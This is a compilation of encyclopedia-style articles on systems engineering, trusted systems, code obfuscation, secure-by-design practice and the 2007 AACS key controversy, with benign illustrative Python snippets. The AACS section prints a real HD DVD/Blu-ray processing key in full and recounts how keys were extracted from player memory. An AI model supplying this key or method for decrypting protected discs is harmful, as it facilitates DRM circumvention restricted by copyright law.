Industrial engineering is a branch of engineering that concerns the development, improvement, implementation, and evaluation of integrated systems of people, money, knowledge, information, equipment, energy, material, and process. Industrial engineering draws upon the principles and methods of engineering analysis and design, as well as the mathematical, physical, and social sciences, to specify, predict, and evaluate the results obtained from such systems. Production systems engineering (PSE) is an emerging branch of engineering intended to uncover fundamental principles of production systems and utilize them for analysis, continuous improvement, and design.[50]

Interface design and its specification are concerned with assuring that the pieces of a system connect and inter-operate with other parts of the system and with external systems as necessary. Interface design also includes assuring that system interfaces are able to accept new features, covering mechanical, electrical, and logical interfaces, including reserved wires, plug-space, command codes, and bits in communication protocols; this is known as extensibility. Human-computer interaction (HCI), or the human-machine interface (HMI), is another aspect of interface design and a critical aspect of modern systems engineering. Systems engineering principles are applied in the design of communication protocols for local area networks and wide area networks.
Mechatronic engineering, like systems engineering, is a multidisciplinary field of engineering that uses dynamic systems modeling to express tangible constructs. In that regard it is almost indistinguishable from systems engineering, but what sets it apart is its focus on smaller details rather than larger generalizations and relationships. As such, the two fields are distinguished by the scope of their projects rather than the methodology of their practice.

Operations research supports systems engineering. Operations research, briefly, is concerned with the optimization of a process under multiple constraints.[51][52]

Performance engineering is the discipline of ensuring that a system meets customer expectations for performance throughout its life. Performance is usually defined as the speed with which a certain operation is executed, or the capability of executing a number of such operations in a unit of time. Performance may be degraded when operations queued for execution are throttled by limited system capacity. For example, the performance of a packet-switched network is characterized by the end-to-end packet transit delay, or the number of packets switched per hour. The design of high-performance systems uses analytical or simulation modeling, whereas the delivery of high-performance implementations involves thorough performance testing. Performance engineering relies heavily on statistics, queueing theory, and probability theory for its tools and processes.
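As a small worked example of the queueing theory mentioned above, the classic M/M/1 formulas below show how latency grows nonlinearly with utilization. The arrival and service rates are invented for illustration.

```python
# Minimal M/M/1 queueing sketch: how utilization drives latency.
# Arrival and service rates below are invented for illustration.

def mm1_metrics(arrival_rate, service_rate):
    """Classic M/M/1 steady-state formulas (Poisson arrivals,
    exponential service times, one server); requires arrival < service."""
    if arrival_rate >= service_rate:
        raise ValueError("System is unstable: utilization >= 1")
    rho = arrival_rate / service_rate                 # utilization
    mean_in_system = rho / (1 - rho)                  # avg. jobs in system (L)
    mean_latency = 1 / (service_rate - arrival_rate)  # avg. time in system (W)
    return rho, mean_in_system, mean_latency

for lam in (50, 80, 95):   # e.g. packets per second arriving
    rho, n, w = mm1_metrics(lam, service_rate=100)
    print(f"load={rho:.2f}  in system={n:5.1f} jobs  latency={w * 1000:6.1f} ms")
```

The point the model makes is qualitative: at 95% utilization the average latency is ten times what it is at 50%, which is why performance engineers size capacity with headroom rather than for average load.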
Program management (or programme management) has many similarities with systems engineering, but has broader-based origins than the engineering ones of systems engineering. Project management is also closely related to both program management and systems engineering. Both include scheduling as an engineering support tool for assessing interdisciplinary concerns under the management process. In particular, the direct relationship of resources, performance features, and risk to the duration of a task, or the dependency links among tasks and their impacts across the system lifecycle, are systems engineering concerns.

Proposal engineering is the application of scientific and mathematical principles to design, construct, and operate a cost-effective proposal development system. Basically, proposal engineering uses the "systems engineering process" to create a cost-effective proposal and increase the odds of a successful proposal.

Reliability engineering is the discipline of ensuring that a system meets customer expectations for reliability throughout its life, i.e. that it does not fail more frequently than expected. Next to the prediction of failure, it is just as much about the prevention of failure. Reliability engineering applies to all aspects of the system. It is closely associated with maintainability, availability (dependability, or RAMS, is preferred by some), and integrated logistics support. Reliability engineering is always a critical component of safety engineering, as in failure mode and effects analysis (FMEA) and hazard fault tree analysis, and of security engineering.

Risk management, the practice of assessing and dealing with risk, is one of the interdisciplinary parts of systems engineering. In development, acquisition, or operational activities, the inclusion of risk in tradeoffs with cost, schedule, and performance features involves the iterative, complex configuration management of traceability and evaluation to the scheduling and requirements management across domains and for the system lifecycle, which requires the interdisciplinary technical approach of systems engineering. Systems engineering has risk management define, tailor, implement, and monitor a structured process for risk management, integrated into the overall effort.[53]

The techniques of safety engineering may be applied by non-specialist engineers in designing complex systems to minimize the probability of safety-critical failures. The "system safety engineering" function helps to identify safety hazards in emerging designs and may assist with techniques to mitigate the effects of (potentially) hazardous conditions that cannot be designed out of systems.

Security engineering can be viewed as an interdisciplinary field that integrates the community of practice for control systems design, reliability, safety, and systems engineering. It may involve such sub-specialties as the authentication of system users, system targets, and others: people, objects, and processes.

From its beginnings, software engineering has helped shape modern systems engineering practice. The techniques used in handling the complexities of large software-intensive systems have had a major effect on the shaping and reshaping of the tools, methods, and processes of systems engineering.
https://en.wikipedia.org/wiki/Systems_engineering
In the security engineering subspecialty of computer science, a trusted system is one that is relied upon to a specified extent to enforce a specified security policy. This is equivalent to saying that a trusted system is one whose failure would break a security policy (if a policy exists that the system is trusted to enforce).

The word "trust" is critical, as it does not carry the meaning that might be expected in everyday usage. A trusted system is one that the user feels safe to use, and trusts to perform tasks without secretly executing harmful or unauthorized programs; trusted computing refers to whether programs can trust the platform to be unmodified from what is expected, whether or not those programs are innocent or malicious, or execute tasks that are undesired by the user.

A trusted system can also be seen as a level-based security system where protection is provided and handled according to different levels. This is commonly found in the military, where information is categorized as unclassified (U), confidential (C), secret (S), top secret (TS), and beyond. Such systems also enforce the policies of no read-up and no write-down.

A subset of trusted systems ("Division B" and "Division A") implement mandatory access control (MAC) labels, and as such it is often assumed that they can be used for processing classified information. However, this is generally untrue. There are four modes in which one can operate a multilevel secure system: multilevel, compartmented, dedicated, and system-high modes. The National Computer Security Center's "Yellow Book" specifies that B3 and A1 systems can only be used for processing a strict subset of security labels, and only when operated according to a particularly strict configuration.

Central to the concept of U.S. Department of Defense-style trusted systems is the notion of a "reference monitor", an entity that occupies the logical heart of the system and is responsible for all access control decisions. Ideally, the reference monitor is tamper-proof, always invoked, and small enough to be subject to independent analysis and tests, the completeness of which can be assured. According to the U.S. National Security Agency's 1983 Trusted Computer System Evaluation Criteria (TCSEC), or "Orange Book", a set of "evaluation classes" were defined that described the features and assurances that the user could expect from a trusted system.

The dedication of significant system engineering toward minimizing the complexity (not size, as often cited) of the trusted computing base (TCB) is key to the provision of the highest levels of assurance (B3 and A1). The TCB is defined as that combination of hardware, software, and firmware that is responsible for enforcing the system's security policy. An inherent engineering conflict would appear to arise in higher-assurance systems: the smaller the TCB, the larger the set of hardware, software, and firmware that lies outside the TCB and is, therefore, untrusted. Although this may lead the more technically naive to sophists' arguments about the nature of trust, the argument confuses the issue of "correctness" with that of "trustworthiness".

The TCSEC has a precisely defined hierarchy of six evaluation classes; the highest of these, A1, is featurally identical to B3, differing only in documentation standards. In contrast, the more recently introduced Common Criteria (CC), which derive from a blend of technically mature standards from various NATO countries, provide a tenuous spectrum of seven "evaluation classes" that intermix features and assurances in a non-hierarchical manner, and lack the precision and mathematical stricture of the TCSEC.
In particular, the CC tolerate very loose identification of the "target of evaluation" (TOE) and support, even encourage, an inter-mixture of security requirements culled from a variety of predefined "protection profiles". While a case can be made that even the seemingly arbitrary components of the TCSEC contribute to a "chain of evidence" that a fielded system properly enforces its advertised security policy, not even the highest (E7) level of the CC can truly provide analogous consistency and stricture of evidentiary reasoning.[citation needed]

The mathematical notions of trusted systems for the protection of classified information derive from two independent but interrelated corpora of work. In 1974, David Bell and Leonard LaPadula of MITRE, under the technical guidance and financial sponsorship of Maj. Roger Schell, Ph.D., of the U.S. Army Electronic Systems Command (Fort Hanscom, MA), devised the Bell–LaPadula model, in which a trustworthy computer system is modeled in terms of objects (passive repositories or destinations for data, such as files, disks, or printers) and subjects (active entities that cause information to flow among objects, e.g. users, or system processes or threads operating on behalf of users). The entire operation of a computer system can indeed be regarded as a "history" (in the serializability-theoretic sense) of pieces of information flowing from object to object in response to subjects' requests for such flows.

At the same time, Dorothy Denning at Purdue University was publishing her Ph.D. dissertation, which dealt with "lattice-based information flows" in computer systems. (A mathematical "lattice" is a partially ordered set, characterizable as a directed acyclic graph, in which the relationship between any two vertices is that one "dominates" the other, "is dominated by" it, or neither.) She defined a generalized notion of "labels" that are attached to entities, corresponding more or less to the full security markings one encounters on classified military documents, e.g. TOP SECRET WNINTEL TK DUMBO.

Bell and LaPadula integrated Denning's concept into their landmark MITRE technical report, entitled Secure Computer System: Unified Exposition and Multics Interpretation. They stated that labels attached to objects represent the sensitivity of the data contained within the object, while those attached to subjects represent the trustworthiness of the user executing the subject. (However, there can be a subtle semantic difference between the sensitivity of the data within the object and the sensitivity of the object itself.) The concepts are unified with two properties: the "simple security property" (a subject can only read from an object that it dominates; "is greater than" is a close, albeit mathematically imprecise, interpretation) and the "confinement property", or "*-property" (a subject can only write to an object that dominates it). These properties are loosely referred to as "no read-up" and "no write-down", respectively. Jointly enforced, they ensure that information cannot flow "downhill" to a repository where insufficiently trustworthy recipients might discover it. By extension, assuming that the labels assigned to subjects are truly representative of their trustworthiness, the no read-up and no write-down rules rigidly enforced by the reference monitor are sufficient to constrain Trojan horses, one of the most general classes of attacks (the popularly reported worms and viruses are specializations of the Trojan horse concept).
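The two Bell–LaPadula properties can be stated compactly in code. The following sketch checks "no read-up" and "no write-down" against a label lattice of (level, category-set) pairs; the levels, categories, and labels are invented for illustration, and this is a model of the rules, not of any fielded reference monitor.

```python
# Minimal sketch of Bell-LaPadula style checks over a label lattice.
# The levels, categories, and example labels are invented.

LEVELS = {"UNCLASSIFIED": 0, "CONFIDENTIAL": 1, "SECRET": 2, "TOP SECRET": 3}

def dominates(label_a, label_b):
    """label_a dominates label_b iff its level is >= and its category
    set is a superset -- a partial order, not a total one."""
    level_a, cats_a = label_a
    level_b, cats_b = label_b
    return LEVELS[level_a] >= LEVELS[level_b] and cats_a >= cats_b

def may_read(subject, obj):
    # Simple security property ("no read-up"):
    # the subject's label must dominate the object's label.
    return dominates(subject, obj)

def may_write(subject, obj):
    # *-property ("no write-down"):
    # the object's label must dominate the subject's label.
    return dominates(obj, subject)

analyst = ("SECRET", {"CRYPTO"})
report  = ("CONFIDENTIAL", {"CRYPTO"})
archive = ("TOP SECRET", {"CRYPTO", "NUCLEAR"})

print(may_read(analyst, report))    # True:  SECRET dominates CONFIDENTIAL
print(may_write(analyst, report))   # False: this would be a write-down
print(may_write(analyst, archive))  # True:  writing "up" is permitted
```

Note that because dominance is only a partial order, two labels with incomparable category sets permit neither reading nor writing in either direction, which is exactly the compartmentalization the lattice is meant to capture.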
The Bell–LaPadula model technically only enforces "confidentiality", or "secrecy", controls: it addresses the problem of the sensitivity of objects and the attendant trustworthiness of subjects not to disclose it inappropriately. The dual problem of "integrity" (i.e. the problem of the accuracy, or even the provenance, of objects) and the attendant trustworthiness of subjects not to modify or destroy it inappropriately is addressed by mathematically affine models, the most important of which is named for its creator, K. J. Biba. Other integrity models include the Clark-Wilson model and Shockley and Schell's program integrity model, "The SeaView Model".[1]

An important feature of MACs is that they are entirely beyond the control of any user. The TCB automatically attaches labels to any subjects executed on behalf of users, and to the files they access or modify. In contrast, an additional class of controls, termed discretionary access controls (DACs), are under the direct control of system users. Familiar protection mechanisms such as permission bits (supported by UNIX since the late 1960s and, in a more flexible and powerful form, by Multics since earlier still) and access control lists (ACLs) are familiar examples of DACs.

The behavior of a trusted system is often characterized in terms of a mathematical model, which may be more or less rigorous depending upon the applicable operational and administrative constraints. The model takes the form of a finite-state machine (FSM) with state criteria, state transition constraints (a set of "operations" that correspond to state transitions), and a descriptive top-level specification (DTLS), which entails a user-perceptible interface such as an API, a set of system calls in UNIX, or system exits in mainframes. Each of these elements engenders one or more model operations.

The Trusted Computing Group creates specifications that are meant to address particular requirements of trusted systems, including attestation of configuration and safe storage of sensitive information.

In the context of national or homeland security, law enforcement, or social control policy, trusted systems provide conditional prediction about the behavior of people or objects prior to authorizing access to system resources.[2] For example, trusted systems include the use of "security envelopes" in national security and counterterrorism applications, "trusted computing" initiatives in technical systems security, and credit or identity scoring systems in financial and anti-fraud applications; in general, they include any system in which the system itself makes a prediction about the trustworthiness of a person or object before authorizing access.

The widespread adoption of these authorization-based security strategies (where the default state is DEFAULT=DENY) for counterterrorism, anti-fraud, and other purposes is helping accelerate the ongoing transformation of modern societies from a notional Beccarian model of criminal justice, based on accountability for deviant actions after they occur,[3] to a Foucauldian model based on authorization, preemption, and general social compliance through ubiquitous preventative surveillance and control through system constraints.[4]

In this emergent model, "security" is geared not towards policing but towards risk management through surveillance, the exchange of information, auditing, communication, and classification. These developments have led to general concerns about individual privacy and civil liberty, and to a broader philosophical debate about appropriate methodologies of social governance.
Trusted systems in the context of information theory are based on the following definition: "Trust is that which is essential to a communication channel but cannot be transferred from a source to a destination using that channel." In information theory, information has nothing to do with knowledge or meaning; it is simply that which is transferred from source to destination, using a communication channel. If, before transmission, the information is already available at the destination, then the transfer is zero. Information received by a party is that which the party does not expect, as measured by the uncertainty of the party as to what the message will be.

Likewise, trust as defined by Gerck has nothing to do with friendship, acquaintance, employee-employer relationships, loyalty, betrayal, and other overly variable concepts. Trust is not taken in the purely subjective sense either, nor as a feeling or something purely personal or psychological; trust is understood as something potentially communicable. Further, this definition of trust is abstract, allowing different instances and observers in a trusted system to communicate based on a common idea of trust (otherwise communication would be isolated in domains), with all the necessarily different subjective and intersubjective realizations of trust in each subsystem (humans and machines) able to coexist.[6]

Taken together in the model of information theory, "information is what you do not expect" and "trust is what you know". Linking both concepts, trust is seen as "qualified reliance on received information". In terms of trusted systems, an assertion of trust cannot be based on the record itself, but on information from other information channels.[7] The deepening of these questions leads to complex conceptions of trust, which have been thoroughly studied in the context of business relationships.[8] It also leads to conceptions of information where the "quality" of information integrates trust or trustworthiness into the structure of the information itself, and of the information system(s) in which it is conceived: higher quality in terms of particular definitions of accuracy and precision means higher trustworthiness.[9]

An example of the calculus of trust is "If I connect two trusted systems, are they more or less trusted when taken together?".[6]

The IBM Federal Software Group[10] has suggested that "trust points"[5] provide the most useful definition of trust for application in an information technology environment, because it is related to other information theory concepts and provides a basis for measuring trust. In a network-centric enterprise services environment, such a notion of trust is considered[10] to be requisite for achieving the desired collaborative, service-oriented architecture vision.
https://en.wikipedia.org/wiki/Trusted_system
Code morphing is an approach used in obfuscating software to protect software applications from reverse engineering, analysis, modification, and cracking. This technology protects intermediate-level code, such as that compiled from Java and .NET languages (Oxygene, C#, Visual Basic, etc.), rather than binary object code. Code morphing breaks up the protected code into several processor commands or small command snippets and replaces them with others, while maintaining the same end result. Thus the protector obfuscates the code at the intermediate level.[1]

Code morphing is a multilevel technology containing hundreds of unique code transformation patterns. In addition, this technology transforms some intermediate-layer commands into virtual machine commands (like p-code). Code morphing does not protect against runtime tracing, which can reveal the execution logic of any protected code.

Unlike other code protectors, there is no concept of code decryption with this method. Protected code blocks are always in the executable state, and they are executed (interpreted) as transformed code. The original intermediate code is absent to a certain degree, but deobfuscation can still give a clear view of the original code flow.

Code morphing is also used to refer to the just-in-time compilation technology used in Transmeta processors such as the Crusoe and Efficeon to implement the x86 instruction set architecture.

Code morphing is often used to obfuscate the copy protection or other checks that a program makes to determine whether it is a valid, authentic installation or an unauthorized copy, in order to make the removal of the copy-protection code more difficult than it would otherwise be.
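The core idea, replacing instruction sequences with semantically equivalent ones, can be illustrated with a toy example. The sketch below "morphs" programs for an invented three-instruction register machine; real code-morphing protectors operate on actual intermediate code and apply hundreds of transformation patterns rather than the single rule shown here.

```python
import random

# Toy sketch of code morphing: rewrite instructions of an invented
# register machine into randomly chosen equivalent sequences, while
# preserving the program's observable behavior.

# Each rule maps one instruction to equivalent alternatives.
REWRITES = {
    ("ADD", "r0", "r1"): [
        [("NEG", "r1"), ("SUB", "r0", "r1"), ("NEG", "r1")],  # a+b == a-(-b)
        [("ADD", "r0", "r1")],                                # identity
    ],
}

def morph(program):
    out = []
    for ins in program:
        choices = REWRITES.get(ins)
        out.extend(random.choice(choices) if choices else [ins])
    return out

def run(program, regs):
    """Tiny interpreter, used here only to check semantic equivalence."""
    regs = dict(regs)
    for op, *args in program:
        if op == "ADD":
            regs[args[0]] += regs[args[1]]
        elif op == "SUB":
            regs[args[0]] -= regs[args[1]]
        elif op == "NEG":
            regs[args[0]] = -regs[args[0]]
    return regs

prog = [("ADD", "r0", "r1")]
morphed = morph(prog)
print(morphed)
print(run(prog, {"r0": 2, "r1": 3}), run(morphed, {"r0": 2, "r1": 3}))  # equal
```

As the article notes, such rewriting changes what an analyst sees without changing what the program does, which is also why runtime tracing still reveals the execution logic.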
https://en.wikipedia.org/wiki/Code_morphing
In software development, obfuscation is the practice of creating source or machine code that is intentionally difficult for humans or computers to understand. Similar to obfuscation in natural language, code obfuscation may involve using unnecessarily roundabout ways to write statements. Programmers often obfuscate code to conceal its purpose, logic, or embedded values. The primary reasons for doing so are to prevent tampering, to deter reverse engineering, or to create a puzzle or recreational challenge for deobfuscation, a challenge often included in crackmes. While obfuscation can be done manually, it is more commonly performed using obfuscators.[1]

The architecture and characteristics of some languages may make them easier to obfuscate than others.[2][3] C,[4] C++,[5][6] and the Perl programming language[7] are some examples of languages that are easy to obfuscate. Haskell is also quite obfuscatable,[8] despite being quite different in structure. The properties that make a language obfuscatable are not immediately obvious.

Types of obfuscation include simple keyword substitution, use or non-use of whitespace to create artistic effects, and self-generating or heavily compressed programs. According to Nick Montfort, techniques may include naming obfuscation (meaningless or deceptive identifier names), data/code/comment confusion (making actual code look like comments, or confusing syntax with data), and double coding (displaying code in the form of poetry or interesting shapes).

A variety of tools exist to perform or assist with code obfuscation. These include experimental research tools developed by academics, hobbyist tools, commercial products written by professionals, and open-source software. Additionally, deobfuscation tools exist, aiming to reverse the obfuscation process. While most commercial obfuscation solutions transform either program source code or platform-independent bytecode, i.e. portable code (as used by Java and .NET), some also work directly on compiled binaries.

Writing and reading obfuscated source code can be a brain teaser. A number of programming contests reward the most creatively obfuscated code, such as the International Obfuscated C Code Contest and the Obfuscated Perl Contest. Short obfuscated Perl programs may be used in the signatures of Perl programmers; these are JAPHs ("Just another Perl hacker").[16]

Cryptographers have explored the idea of obfuscating code so that reverse-engineering it is cryptographically hard. This is formalized in the many proposals for indistinguishability obfuscation, a cryptographic primitive that, if it were possible to build securely, would allow the construction of many other kinds of cryptography, including completely novel types that no one knows how to make. (A stronger notion, black-box obfuscation, is known to be impossible in general.)[17][18]

Some anti-virus software, such as AVG AntiVirus,[20] will also alert users when they land on a website with code that is manually obfuscated, as one of the purposes of obfuscation can be to hide malicious code. However, some developers may employ code obfuscation for the purpose of reducing file size or increasing security. The average user may not expect their antivirus software to provide alerts about an otherwise harmless piece of code, especially from trusted corporations, so such a feature may actually deter users from using legitimate software. Mozilla and Google disallow browser extensions containing obfuscated code in their add-ons stores.[21][22]
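Two of the simplest techniques mentioned above, meaningless identifiers and encoded string literals, can be shown side by side. In this hand-made sketch the second function is an obfuscated equivalent of the first; real obfuscators apply such transformations automatically and at scale.

```python
import base64

# Toy sketch of two common obfuscation techniques: meaningless
# identifier names and encoded string literals. The transformation
# here is applied by hand to keep the example short.

# Original, readable version.
def greet(name):
    return "Hello, " + name

# Obfuscated equivalent: deceptive names, string hidden in base64.
def _0x1(_0x2):
    return base64.b64decode(b"SGVsbG8sIA==").decode() + _0x2

print(greet("Ada"))   # Hello, Ada
print(_0x1("Ada"))    # Hello, Ada -- same behavior, harder to read
```

Note that the transformation preserves behavior exactly, which is the defining constraint of all obfuscation: the program must remain equivalent for the machine while becoming opaque to the reader.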
There has been debate on whether it is illegal to skirt copyleft software licenses by releasing source code in obfuscated form, such as in cases in which the author is less willing to make the source code available. The issue is addressed in the GNU General Public License by requiring the "preferred form for making modifications" to be made available.[23] The GNU website states, "Obfuscated 'source code' is not real source code and does not count as source code."[24]

A decompiler is a tool that can reverse-engineer source code from an executable or library. This process is sometimes referred to as a man-at-the-end (MATE) attack, inspired by the traditional "man-in-the-middle" attack in cryptography. The decompiled source code is often hard to read, containing random function and variable names, incorrect variable types, and logic that differs from the original source code due to compiler optimizations.

Model obfuscation is a technique to hide the internal structure of a machine learning model,[25] turning the model into a black box. It is the contrary of explainable AI. Obfuscation can also be applied to training data before it is fed into the model, adding random noise that hides sensitive information about the properties of individual samples and groups of samples.[26]
https://en.wikipedia.org/wiki/Obfuscation_(software)
Secure by design, in software engineering, means that software products and capabilities have been designed to be foundationally secure. Alternate security strategies, tactics, and patterns are considered at the beginning of a software design; the best are selected and enforced by the architecture, and then used as guiding principles for developers.[1] It is also encouraged to use strategic design patterns that have beneficial effects on security, even though those design patterns were not originally devised with security in mind.[2]

Secure by design is increasingly becoming the mainstream development approach for ensuring the security and privacy of software systems. In this approach, security is considered and built into the system at every layer, starting with a robust architecture design. Security architectural design decisions are based on well-known security strategies, tactics, and patterns, defined as reusable techniques for achieving specific quality concerns. Security tactics and patterns provide solutions for enforcing the necessary authentication, authorization, confidentiality, data integrity, privacy, accountability, availability, safety, and non-repudiation requirements, even when the system is under attack.[3] In order to ensure the security of a software system, it is important not only to design a robust intended security architecture but also to map updated security strategies, tactics, and patterns to software development, in order to maintain security persistence.

Malicious attacks on software should be assumed to occur, and care is taken to minimize their impact. Security vulnerabilities are anticipated, along with invalid user input.[4] Closely related is the practice of using "good" software design, such as domain-driven design or cloud native, as a way to increase security by reducing the risk of vulnerability-opening mistakes, even though the design principles used were not originally conceived for security purposes.

Generally, designs that work well do not rely on being secret. Often, secrecy reduces the number of attackers by demotivating a subset of the threat population. The logic is that an increase in complexity for the attacker increases the effort needed to compromise the target and so discourages the attempt. While this technique implies reduced inherent risks, a virtually infinite set of threat actors and techniques applied over time will cause most secrecy methods to fail. While not mandatory, proper security usually means that everyone is allowed to know and understand the design because it is secure. This has the advantage that many people are looking at the source code, which improves the odds that any flaws will be found sooner (see Linus's law). The disadvantage is that attackers can also obtain the code, which makes it easier for them to find vulnerabilities to exploit. It is generally believed, though, that the advantage of open source code outweighs the disadvantage.

Also, it is important that everything works with the fewest privileges possible (see the principle of least privilege). For example, a web server that runs as the administrative user ("root" or "admin") can have the privilege to remove files and users. A flaw in such a program could therefore put the entire system at risk, whereas a web server that runs inside an isolated environment, and only has the privileges for the network and filesystem functions it requires, cannot compromise the system it runs on unless the security around it is itself also flawed.
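On Unix-like systems, the least-privilege pattern just described is often implemented by performing the one privileged step first and then permanently dropping root. The sketch below shows the usual ordering; the uid/gid values and the helper names in the trailing comments are invented for illustration.

```python
import os

# Minimal sketch (Unix-only) of the least-privilege pattern: do the
# single privileged operation first, then permanently drop root before
# handling any untrusted input. The uid/gid values are illustrative
# (33 happens to be 'www-data' on Debian-family systems).

def drop_privileges(uid=33, gid=33):
    if os.getuid() != 0:
        return                   # already running unprivileged
    os.setgroups([])             # drop supplementary groups
    os.setgid(gid)               # change group first, while still root
    os.setuid(uid)               # then user; root is now unrecoverable

# Typical shape of a server using this pattern (helpers hypothetical):
#   sock = bind_to_port_80()     # the one step that needs root
#   drop_privileges()
#   serve_requests(sock)         # all request handling runs unprivileged
```

The ordering matters: the group must be changed before the user, because once setuid succeeds the process no longer has the privilege to call setgid.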
Secure design should be a consideration throughout the development lifecycle (whichever development methodology is chosen). Some pre-built secure-by-design development methodologies exist (e.g. the Microsoft Security Development Lifecycle). Standards and legislation exist to aid secure design by controlling the definition of "secure" and by providing concrete steps for testing and integrating secure systems; several published standards cover or touch on secure-by-design principles.

In server/client architectures, the program on the other side may not be an authorized client, and the client's server may not be an authorized server. Even when they are, a man-in-the-middle attack could compromise communications. Often the easiest way to break the security of a client/server system is not to attack the security mechanisms head-on, but to go around them. A man-in-the-middle attack is a simple example of this, because it can be used to collect details with which to impersonate a user. This is why it is important to consider encryption, hashing, and other security mechanisms in a design, to ensure that information collected from a potential attacker will not allow access.

Another key feature of client-server security design is good coding practice. For example, following a known software design structure, such as client and broker, can help in designing a well-built structure with a solid foundation. Furthermore, if the software is to be modified in the future, it is even more important that it follows a logical foundation of separation between the client and server. This is because if a programmer comes in and cannot clearly understand the dynamics of the program, they may end up adding or changing something that introduces a security flaw. Even with the best design this is always a possibility, but the better the standardization of the design, the smaller the chance of this occurring.
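One simple application of the hashing mentioned above is to authenticate each client message with an HMAC, so that data captured by a man-in-the-middle cannot be forged or tampered with without the shared key. This is a minimal sketch; key distribution, replay protection, and transport encryption (e.g. TLS) are deliberately omitted.

```python
import hashlib
import hmac
import secrets

# Minimal sketch of message authentication with an HMAC. In a real
# deployment the key would be provisioned out-of-band, and replay
# protection and encryption would also be needed.

SECRET_KEY = secrets.token_bytes(32)   # shared between client and server

def sign(message: bytes) -> bytes:
    return hmac.new(SECRET_KEY, message, hashlib.sha256).digest()

def verify(message: bytes, tag: bytes) -> bool:
    # compare_digest avoids leaking information through timing differences
    return hmac.compare_digest(sign(message), tag)

msg = b"transfer=10&to=alice"
tag = sign(msg)
print(verify(msg, tag))                        # True
print(verify(b"transfer=10&to=mallory", tag))  # False: tampered message
```

The design point is that an eavesdropper who records traffic learns nothing that lets them construct a valid tag for a different message, which closes the "go around the mechanism" route described above for this particular attack.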
https://en.wikipedia.org/wiki/Secure_by_design
A controversy surrounding the AACS processing key arose in April 2007 when the Motion Picture Association of America and the Advanced Access Content System Licensing Administrator, LLC (AACS LA) began issuing cease and desist letters[7] to websites publishing a 128-bit (16-byte) number, represented in hexadecimal as 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0[8][9] (commonly referred to as 09 F9),[10][11] a cryptographic key for HD DVDs and Blu-ray Discs. The letters demanded the immediate removal of the key and any links to it, citing the anti-circumvention provisions of the United States Digital Millennium Copyright Act (DMCA).

In response to widespread Internet postings of the key, the AACS LA issued various press statements, praising websites that complied with its requests for acting in a "responsible manner" and warning that "legal and technical tools" were adapting to the situation. The controversy escalated further in early May 2007, when the aggregate news site Digg received a DMCA cease and desist notice, then removed numerous articles on the matter and banned users from reposting the information.[12] This sparked what some describe as a digital revolt[13] or "cyber-riot"[14] in which users posted and spread the key on Digg and throughout the Internet en masse, leading to a Streisand effect. The AACS LA described this situation as an "interesting new twist".[15]

Because the encryption key may be used as part of circumvention technology forbidden by the DMCA, its possession and distribution have been viewed as illegal by the AACS LA, as well as by some legal professionals.[7][16] Since it is a 128-bit numerical value, it was dubbed an illegal number.[17][18][19] Opponents of the expansion of the scope of copyright criticize the idea of making a particular number illegal.[20]

Commercial HD DVDs and Blu-ray discs integrate copy protection technology specified by the AACS LA. There are several interlocking encryption mechanisms, such that cracking one part of the system does not necessarily crack other parts. Therefore, the "09 F9" key is only one of many parts needed to play a disc on an unlicensed player.

AACS can be used to revoke the key of a specific playback device after it is known to have been compromised, as it was for WinDVD.[21] Compromised players can still be used to view old discs, but not newer releases, which lack encryption keys for the compromised players. If other players are then cracked, further revocation would lead to legitimate users of compromised players being forced to upgrade or replace their player software or firmware in order to view new discs.

Each playback device comes with a binary tree of secret device and processing keys. The processing key in this tree, required to play AACS-encrypted discs, is selected based on the device key and the information on the disc to be played. As such, a processing key such as the "09 F9" key is not itself revoked; rather, newly produced discs cause the playback devices to select a different valid processing key to decrypt them.[22]
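The flavor of tree-based revocation can be conveyed with a toy "complete subtree" scheme, in which each device knows the node keys on its leaf-to-root path and a disc encrypts its media key under the smallest set of subtree keys covering all non-revoked devices. This is a simplified stand-in: AACS itself uses a more elaborate subset-difference scheme, and the keys below are just integer labels.

```python
# Toy sketch of tree-based key revocation (the "complete subtree"
# idea behind broadcast-encryption schemes; AACS uses a more elaborate
# subset-difference variant). Node keys are represented by their
# positions in a heap-ordered perfect binary tree.

TREE_HEIGHT = 3                      # 8 devices: leaves 8..15

def path_keys(leaf):
    """Keys a device stores: every node on its leaf-to-root path."""
    keys, node = set(), leaf
    while node >= 1:
        keys.add(node)
        node //= 2
    return keys

def cover(revoked_leaves):
    """Smallest set of subtree roots covering every non-revoked leaf."""
    tainted = set()
    for leaf in revoked_leaves:      # mark all ancestors of revoked leaves
        node = leaf
        while node >= 1:
            tainted.add(node)
            node //= 2
    chosen = []
    def walk(node):
        if node not in tainted:      # whole subtree is clean: one key covers it
            chosen.append(node)
        elif node < 2 ** TREE_HEIGHT:  # tainted internal node: recurse
            walk(2 * node)
            walk(2 * node + 1)
    walk(1)
    return chosen

# A disc encrypts its media key under each cover key; device 13 is revoked.
print(cover([13]))                        # [2, 12, 7]
print(path_keys(13) & set(cover([13])))   # empty set: device 13 is locked out
```

Every non-revoked device holds at least one cover key on its path and can decrypt new discs, while the revoked device holds none, which matches the behavior described above: old discs still play, new discs simply route around the compromised key material.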
On December 26, 2006, a person using the alias muslix64 published a utility named BackupHDDVD and its source code on the DVD decryption forum at the website Doom9.[23] BackupHDDVD can be used to decrypt AACS-protected content once one knows the encryption key.[24] muslix64 claimed to have found title and volume keys in main memory while playing HD DVDs with a software player, and that finding them was not difficult.[25]

On January 1, 2007, muslix64 published a new version of the program, with volume key support.[26] On January 12, 2007, other forum members detailed how to find other title and volume keys, stating that they had also found the keys of several movies in RAM while running WinDVD. On or about January 13, a title key was posted on pastebin.com in the form of a riddle, which was solved by entering terms into the Google search engine; by converting the results to hexadecimal, a correct key could be formed.[27] Later that day, the first cracked HD DVD, Serenity, was uploaded to a private torrent tracker.[28] The AACS LA confirmed on January 26 that the title keys on certain HD DVDs had been published without authorization.[29]

Doom9.org forum user arnezami found and published the "09 F9" AACS processing key on February 11, writing: "Nothing was hacked, cracked or even reverse-engineered btw: I only had to watch the 'show' in my own memory. No debugger was used, no binaries changed." This key is not specific to any playback device or DVD title. Doom9.org forum user jx6bpm claimed on March 4 to have revealed CyberLink PowerDVD's key, and that it was the key in use by AnyDVD.[31]

The AACS LA announced on April 16 that it had revoked the decryption keys associated with certain software high-definition DVD players, which would not be able to decrypt AACS-encrypted discs mastered after April 23 without a software update.[32][33]

